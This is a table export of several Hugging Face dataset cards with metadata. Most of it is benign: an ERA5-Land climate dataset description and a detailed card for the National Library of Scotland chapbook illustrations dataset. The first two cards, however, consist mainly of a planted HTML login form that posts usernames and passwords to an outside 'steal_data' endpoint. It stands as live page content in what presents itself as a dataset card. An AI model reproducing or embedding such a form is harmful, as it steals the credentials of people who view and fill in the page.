sha | text | id | tags | created_at | metadata | last_modified | arxiv | languages | tags_str | text_str | text_lists | processed_texts
---|---|---|---|---|---|---|---|---|---|---|---|---|
1814a7e4c91dc6bfc0f7654da1170d3cafed64a6 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form>
## Test
**test2** | testname/TestCard | [
"region:us"
] | 2022-07-23T01:14:50+00:00 | {} | 2022-07-23T01:27:28+00:00 | [] | [] | TAGS
#region-us
| <form action="URL method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form>
## Test
test2 | [
"## Test\n test2"
] | [
"TAGS\n#region-us \n",
"## Test\n test2"
] |
4cbca4e0faa2eca2064f49fe5159723c276eb905 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form> | dsadasdad/tesfdjh | [
"region:us"
] | 2022-07-23T01:38:32+00:00 | {} | 2022-07-23T01:39:57+00:00 | [] | [] | TAGS
#region-us
| <form action="URL method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form> | [] | [
"TAGS\n#region-us \n"
] |
3a590f87db94258c732e8d8ce68d188697818991 |
This dataset comprises ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5 reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file covers one day and holds 24 timesteps. | openclimatefix/era5-land | [
"license:mit",
"region:us"
] | 2022-07-23T14:13:58+00:00 | {"license": "mit"} | 2022-12-01T12:38:35+00:00 | [] | [] | TAGS
#license-mit #region-us
|
This dataset comprises ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5 reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here; a conversion sketch follows this row. Each file covers one day and holds 24 timesteps. | [] | [
"TAGS\n#license-mit #region-us \n"
] |
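For readers who want to reproduce the NetCDF-to-Zarr step described in the row above, a minimal xarray sketch follows. The file names are hypothetical and the chunking choice is an assumption; the exact settings used by the curators are not documented here.

```python
import xarray as xr

# Hypothetical input: one day of ERA5-Land data, 24 hourly timesteps.
ds = xr.open_dataset("era5_land_2022-10-01.nc")

# Chunk along time and write a consolidated Zarr store; the chunk size
# here is an assumption, not the curators' documented choice.
ds.chunk({"time": 24}).to_zarr("era5_land_2022-10-01.zarr", consolidated=True)
```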
36582224499cc4c4c364ddec6d5de46839e1c451 |
# Dataset Card for National Library of Scotland Chapbook Illustrations
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/
- **Repository:** https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/
- **Paper:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf
- **Leaderboard:**
- **Point of Contact:** [email protected]
### Dataset Summary
This dataset comprises images from chapbooks held by the [National Library of Scotland](https://www.nls.uk/) and digitised and published as its [Chapbooks Printed in Scotland](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) dataset.
> "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -[Source](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/)
Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.
This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the [Visual Geometry Group](https://www.robots.ox.ac.uk/~vgg/) in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship [awarded](https://data.nls.uk/projects/the-national-librarians-research-fellowship-in-digital-scholarship/) to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in [this paper](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf).
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/).
### Supported Tasks and Leaderboards
- `object-detection`: the dataset contains bounding boxes for images contained in the Chapbooks
- `image-classification`: a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.
- `image-matching`: a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/).
The performance on the `object-detection` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
| IOU threshold | Precision | Recall |
|---------------|-----------|--------|
| 0.50 | 0.993 | 0.911 |
| 0.75 | 0.987 | 0.905 |
| 0.95 | 0.973 | 0.892 |
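For context, the IoU (intersection-over-union) thresholds above measure bounding-box overlap between a detection and the ground truth. A minimal sketch of the computation, assuming the COCO-style `[x, y, width, height]` box format used elsewhere in this card (this is illustrative, not the paper's evaluation code):

```python
def iou(box_a, box_b):
    """Intersection over union of two [x, y, width, height] boxes."""
    ax, ay, aw, ah = box_a
    bx, by, bw, bh = box_b
    # Width/height of the overlap rectangle (zero if the boxes are disjoint).
    inter_w = max(0.0, min(ax + aw, bx + bw) - max(ax, bx))
    inter_h = max(0.0, min(ay + ah, by + bh) - max(ay, by))
    inter = inter_w * inter_h
    union = aw * ah + bw * bh - inter
    return inter / union if union > 0 else 0.0

# Two half-overlapping boxes -> IoU of 2500 / 17500, about 0.143
print(iou([0, 0, 100, 100], [50, 50, 100, 100]))
```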
The performance on the `image classification` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
Images in original dataset: 47329
Number of images on which at least one illustration was detected: 3629
Note that these figures do not represent images that contained multiple detections.
See the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for examples of false-positive detections.
The performance on the 'image-matching' task is undergoing evaluation.
### Languages
Text accompanying the illustrations is in English, Scots or Scottish Gaelic.
## Dataset Structure
### Data Instances
An example instance from the `illustration-detection` split:
```python
{'image_id': 4,
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'width': 600,
'height': 1080,
'objects': [{'category_id': 0,
'image_id': '4',
'id': 1,
'area': 110901,
'bbox': [34.529998779296875,
556.8300170898438,
401.44000244140625,
276.260009765625],
'segmentation': [[34.529998779296875,
556.8300170898438,
435.9700012207031,
556.8300170898438,
435.9700012207031,
833.0900268554688,
34.529998779296875,
833.0900268554688]],
'iscrowd': False}]}
```
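As a usage illustration for an instance like the one above, the bounding box can be drawn onto the page image with PIL. This is a sketch, not part of the dataset's own tooling; it converts the COCO-style `[x, y, width, height]` box to the `[x0, y0, x1, y1]` corners PIL expects.

```python
from PIL import ImageDraw

def draw_boxes(example):
    """Draw each annotated bounding box onto a copy of the page image."""
    image = example["image"].copy()
    draw = ImageDraw.Draw(image)
    for obj in example["objects"]:
        x, y, w, h = obj["bbox"]  # COCO-style [x, y, width, height]
        draw.rectangle([x, y, x + w, y + h], outline="red", width=3)
    return image

# draw_boxes(instance).save("annotated_page.jpg")
```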
An example instance from the `image-classification` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'label': 1}
```
An example from the `image-matching` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'group-label': 231}
```
### Data Fields
The fields for the `illustration-detection` config:
- image_id: id for the image
- height: height of the image
- width: width of the image
- image: image of the chapbook page
- objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
- bbox: bounding boxes for the images
- category_id: a label for the image
- image_id: id for the image
- iscrowd: COCO is a crowd flag
- segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
The fields for the `image-classification` config:
- image: image
- label: a label indicating if the page contains an illustration or not
The fields for the `image-matching` config:
- image: image of the chapbook page
- label: an id for a particular instance of an image, i.e. the same images will share the same id.
### Data Splits
There is a single split `train` for all configs. K-fold validation was used in the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) describing this dataset, so no existing splits were defined.
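Because only a `train` split ships with the dataset, a K-fold protocol like the paper's has to be recreated on the user side. A minimal sketch, assuming the repository and config names given in this card:

```python
import numpy as np
from datasets import load_dataset
from sklearn.model_selection import KFold

# Repository and config names taken from this card; adjust if they differ.
ds = load_dataset("biglam/nls_chapbook_illustrations", "image-classification", split="train")

kf = KFold(n_splits=5, shuffle=True, random_state=0)
for fold, (train_idx, val_idx) in enumerate(kf.split(np.arange(len(ds)))):
    train_ds, val_ds = ds.select(train_idx), ds.select(val_idx)
    print(f"fold {fold}: {len(train_ds)} train / {len(val_ds)} validation examples")
```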
## Dataset Creation
### Curation Rationale
The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/), this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this [public demo](http://meru.robots.ox.ac.uk/nls_chapbooks/filelist) documented [here](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/).
### Source Data
#### Initial Data Collection and Normalization
The initial data was taken from the [National Library of Scotland's Chapbooks Printed in Scotland dataset](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/). No normalisation was performed; only the images and a subset of the metadata were used. OCR text was not used.
#### Who are the source language producers?
The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS [Data Foundry](https://data.nls.uk) under the direction of Dr. Sarah Ames.
This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.
### Annotations
#### Annotation process
Annotation was initially performed on a subset of 337 of the 47329 images, using the [VGG List Annotator (LISA)](https://gitlab.com/vgg/lisa) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see [this paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for more details). Initial detections were performed with an [EfficientDet](https://ai.googleblog.com/2020/04/efficientdet-towards-scalable-and.html) object detector trained on [COCO](https://cocodataset.org/#home), the annotation of which is described in [this paper](https://arxiv.org/abs/1405.0312).
#### Who are the annotators?
Abhishek Dutta created the initial 337 annotations for retraining the EfficientDet model. Detections were reviewed and in some cases revised by Giles Bergel.
### Personal and Sensitive Information
None
## Considerations for Using the Data
### Social Impact of Dataset
We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.
### Discussion of Biases
While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.
As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.
### Other Known Limitations
Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.
## Additional Information
### Dataset Curators
- Giles Bergel
- Abhishek Dutta
### Licensing Information
In accordance with the [original data](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/), this dataset is in the public domain.
### Citation Information
``` bibtex
@inproceedings{10.1145/3476887.3476893,
author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew},
title = {Visual Analysis of Chapbooks Printed in Scotland},
year = {2021},
isbn = {9781450386906},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
url = {https://doi.org/10.1145/3476887.3476893},
doi = {10.1145/3476887.3476893},
abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.},
booktitle = {The 6th International Workshop on Historical Document Imaging and Processing},
pages = {67–72},
numpages = {6},
keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset},
location = {Lausanne, Switzerland},
series = {HIP '21}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) and Giles Bergel for adding this dataset. | biglam/nls_chapbook_illustrations | [
"task_categories:object-detection",
"task_categories:image-classification",
"task_ids:multi-class-image-classification",
"annotations_creators:expert-generated",
"size_categories:1K<n<10K",
"license:other",
"lam",
"historic",
"arxiv:1405.0312",
"region:us"
] | 2022-07-23T20:05:40+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["object-detection", "image-classification"], "task_ids": ["multi-class-image-classification"], "pretty_name": "National Library of Scotland Chapbook Illustrations", "tags": ["lam", "historic"]} | 2023-02-15T16:11:54+00:00 | [
"1405.0312"
] | [] | TAGS
#task_categories-object-detection #task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-expert-generated #size_categories-1K<n<10K #license-other #lam #historic #arxiv-1405.0312 #region-us
| Dataset Card for National Library of Scotland Chapbook Illustrations
====================================================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage: URL
* Repository: URL
* Paper: URL
* Leaderboard:
* Point of Contact: URL@URL
### Dataset Summary
This dataset comprises images from chapbooks held by the National Library of Scotland and digitised and published as its Chapbooks Printed in Scotland dataset.
>
> "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -Source
>
>
>
Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.
This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the Visual Geometry Group in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship awarded to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in this paper.
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the VGG Image Search Engine (VISE) software.
### Supported Tasks and Leaderboards
* 'object-detection': the dataset contains bounding boxes for images contained in the Chapbooks
* 'image-classification': a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.
* 'image-matching': a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the VGG Image Search Engine (VISE) software.
The performance on the 'object-detection' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:
IOU threshold: 0.50, Precision: 0.993, Recall: 0.911
IOU threshold: 0.75, Precision: 0.987, Recall: 0.905
IOU threshold: 0.95, Precision: 0.973, Recall: 0.892
The performance on the 'image classification' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:
Images in original dataset: 47329
Number of images on which at least one illustration was detected: 3629
Note that these figures do not represent images that contained multiple detections.
See the paper for examples of false-positive detections.
The performance on the 'image-matching' task is undergoing evaluation.
### Languages
Text accompanying the illustrations is in English, Scots or Scottish Gaelic.
Dataset Structure
-----------------
### Data Instances
An example instance from the 'illustration-detection' split:
An example instance from the 'image-classification' split:
An example from the 'image-matching' split:
### Data Fields
The fields for the 'illustration-detection' config:
* image\_id: id for the image
* height: height of the image
* width: width of the image
* image: image of the chapbook page
* objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
+ bbox: bounding boxes for the images
+ category\_id: a label for the image
+ image\_id: id for the image
+ iscrowd: COCO is a crowd flag
+ segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
The fields for the 'image-classification' config:
* image: image
* label: a label indicating if the page contains an illustration or not
The fields for the 'image-matching' config:
* image: image of the chapbook page
* label: an id for a particular instance of an image, i.e. the same images will share the same id.
### Data Splits
There is a single split 'train' for all configs. K-fold validation was used in the paper describing this dataset, so no existing splits were defined.
Dataset Creation
----------------
### Curation Rationale
The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of VGG Image Search Engine (VISE) software, this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this public demo documented here.
### Source Data
#### Initial Data Collection and Normalization
The initial data was taken from the National Library of Scotland's Chapbooks Printed in Scotland dataset. No normalisation was performed; only the images and a subset of the metadata were used. OCR text was not used.
#### Who are the source language producers?
The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS Data Foundry under the direction of Dr. Sarah Ames.
This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.
### Annotations
#### Annotation process
Annotation was initially performed on a subset of 337 of the 47329 images, using the VGG List Annotator (LISA) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see this paper for more details). Initial detections were performed with an EfficientDet object detector trained on COCO, the annotation of which is described in this paper.
#### Who are the annotators?
Abhishek Dutta created the initial 337 annotations for retraining the EfficientDet model. Detections were reviewed and in some cases revised by Giles Bergel.
### Personal and Sensitive Information
None
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.
### Discussion of Biases
While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.
As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.
### Other Known Limitations
Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.
Additional Information
----------------------
### Dataset Curators
* Giles Bergel
* Abhishek Dutta
### Licensing Information
In accordance with the original data, this dataset is in the public domain.
### Contributions
Thanks to @davanstrien and Giles Bergel for adding this dataset.
| [
"### Dataset Summary\n\n\nThis dataset comprises of images from chapbooks held by the National Library of Scotland and digitised and published as its Chapbooks Printed in Scotland dataset.\n\n\n\n> \n> \"Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands.\" -Source\n> \n> \n> \n\n\nChapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.\n\n\nThis dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the Visual Geometry Group in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship awarded to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in this paper.\n\n\nThe dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the VGG Image Search Engine (VISE) software",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': the dataset contains bounding boxes for images contained in the Chapbooks\n* 'image-classification': a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.\n* 'image-matching': a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the VGG Image Search Engine (VISE) software.\n\n\nThe performance on the 'object-detection' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nIOU threshold: 0.50, Precision: 0.993, Recall: 0.911\nIOU threshold: 0.75, Precision: 0.987, Recall: 0.905\nIOU threshold: 0.95, Precision: 0.973, Recall: 0.892\n\n\nThe performance on the 'image classification' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nImages in original dataset: 47329\nNumbers of images on which at least one illustration was detected: 3629\n\n\nNote that these figures do not represent images that contained multiple detections.\n\n\nSee the paper for examples of false-positive detections.\n\n\nThe performance on the 'image-matching' task is undergoing evaluation.",
"### Languages\n\n\nText accompanying the illustrations is in English, Scots or Scottish Gaelic.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example instance from the 'illustration-detection' split:\n\n\nAn example instance from the 'image-classification' split:\n\n\nAn example from the 'image-matching' split:",
"### Data Fields\n\n\nThe fields for the 'illustration-detection' config:\n\n\n* image\\_id: id for the image\n* height: height of the image\n* width: width of the image\n* image: image of the chapbook page\n* objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ bbox: bounding boxes for the images\n\t+ category\\_id: a label for the image\n\t+ image\\_id: id for the image\n\t+ iscrowd: COCO is a crowd flag\n\t+ segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)\n\n\nThe fields for the 'image-classification' config:\n\n\n* image: image\n* label: a label indicating if the page contains an illustration or not\n\n\nThe fields for the 'image-matching' config:\n\n\n* image: image of the chapbook page\n* label: an id for a particular instance of an image i.e. the same images will share the same id.",
"### Data Splits\n\n\nThere is a single split 'train' for all configs. K-fold validation was used in the paper describing this dataset, so no existing splits were defined.\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\nThe dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of VGG Image Search Engine (VISE) software, this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this public demo documented here",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe initial data was taken from the National Library of Scotland's Chapbooks Printed in Scotland dataset No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.",
"#### Who are the source language producers?\n\n\nThe initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS Data Foundry under the direction of Dr. Sarah Ames.\n\n\nThis subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.",
"### Annotations",
"#### Annotation process\n\n\nAnnotation was initially performed on a subset of 337 of the 47329 images, using the VGG List Annotator (LISA software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see this paper for more details). Initial detections were performed with an EfficientDet object detector trained on COCO, the annotation of which is described in this paper",
"#### Who are the annotators?\n\n\nAbhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.",
"### Personal and Sensitive Information\n\n\nNone\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nWe believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.",
"### Discussion of Biases\n\n\nWhile the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.\n\n\nThe definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.\n\n\nAs there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.",
"### Other Known Limitations\n\n\nWithin this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\n* Giles Bergel\n* Abhishek Dutta",
"### Licensing Information\n\n\nIn accordance with the original data, this dataset is in the public domain.",
"### Contributions\n\n\nThanks to @davanstrien and Giles Bergel for adding this dataset."
] | [
"TAGS\n#task_categories-object-detection #task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-expert-generated #size_categories-1K<n<10K #license-other #lam #historic #arxiv-1405.0312 #region-us \n",
"### Dataset Summary\n\n\nThis dataset comprises of images from chapbooks held by the National Library of Scotland and digitised and published as its Chapbooks Printed in Scotland dataset.\n\n\n\n> \n> \"Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands.\" -Source\n> \n> \n> \n\n\nChapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.\n\n\nThis dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the Visual Geometry Group in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship awarded to Giles Bergel in 2020. 